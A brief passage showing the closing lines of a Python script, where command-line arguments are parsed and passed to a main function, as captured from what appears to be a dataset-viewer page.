ARGS = PARSER.parse_args()
main(ARGS)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.